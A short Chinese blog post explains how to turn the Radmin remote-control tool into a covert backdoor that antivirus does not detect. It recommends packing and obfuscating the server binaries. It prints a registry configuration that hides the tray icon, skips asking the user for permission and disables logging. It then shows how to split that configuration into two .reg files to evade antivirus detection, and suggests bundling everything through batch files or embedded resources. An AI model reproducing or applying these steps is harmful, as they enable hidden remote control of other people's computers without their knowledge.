光之神谕的ＢＬＯＧ

说实在的radmin我很少使，用惯了反弹马，直连已经很不习惯了，但是这东西稳定，屏幕监视估计是最好的了，网管用起来做远程维护也比较简单，但是用的人太多了，就算是正常合法的远控，ＢＴ的杀毒也不放过了，好象卖咖啡～诺顿什么的早就把其报为危险对象了，一不小心就给杀咯．

r_server.exe

raddrv.dll

AdmDll.dll

↓

最简单的方法：加壳加花.（不会可以去死了）

密码配置信息.reg（有趣的是这个，杀毒连个注册表文件都不放过）

↓

完整的例子：

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:df,ac,59,ee,60,c7,c2,c8,5b,3d,74,dd,9d,f5,57,2b
"Port"=hex:15,1e,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00

　　　　　　　直接被杀猪啊～～～

免杀例子：分别写成两个reg文件，先后导入就ＯＫ

１.reg

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:df,ac,59,ee,60,c7,c2,c8,5b,3d,74,dd,9d,f5,57,2b
"Port"=hex:15,1e,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"

2.reg

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00

PS:思路就是这样，打包，批处理，做成资源释放形式什么的，随便你了，重要的是免杀了.